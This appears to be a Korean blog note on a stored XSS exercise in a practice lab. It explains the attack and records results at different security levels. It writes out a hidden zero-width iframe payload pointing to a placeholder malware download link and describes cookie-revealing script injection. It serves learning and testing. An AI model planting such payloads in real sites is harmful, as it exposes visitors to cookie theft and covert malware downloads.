XSS - Stored (Blog)

XSS(Cross Site Script) - Stored (Blog)

 

이 취약점이 발견 되었을 때 처음에는 한 페이지에서 다른 페이지에게 악의적인 요청을 보내는 방식인 Cross site와 관련되어 있는 줄 알고 이렇게 이름이 붙혀졌지만  XSS는 사이트 간 요청이 아니라, 웹사이트에서 악성 스크립트를 실행하는 공격이다. 그래서 CSS 라고 불려야하는데 html의 CSS랑 이름이 겹쳐서 C가 X로 변경되었다고 한다.

 

보통 XSS 공격의 유형에는 Reflected(반사) 기법, Stored(저장) 기법이 있는데 

Stored는 댓글이나 게시글 형식으로 스크립트를 저장? 게시? 해두고 다른 사용자들이 이 필터링 되지 않은 댓글이나 게시글을 접하면 그 스크립트가 실행되어서 악의적인 코드가 실행되는 방법이다.

 

 

 

 

이런식으로 쿠키값을 보여주는 스크립트문을 게시해두면

 

게시판에 들어갈 때 마다 쿠키값을 보여주는 스크립트가 실행된다.

 

 

 

 

<iframe src="http://악성코드 다운링크" width=0></iframe>

 

이런식으로 자동으로 악성코드을 입력하여 나도모르게 악성코드를 다운받게 할 수도 있다.

(이 사진은 확인을 위해 width를 100으로 넓혔지만 0으로 놓으면 아무것도 안보임)

 

 

 

 

 

Security LEVEL = midum

 

 

 

 

 

쿠키값 보여주는 Script는 변함없이 동작하지만 

 

iframe은 막힌듯하다

 

상은 스크립트도 막힘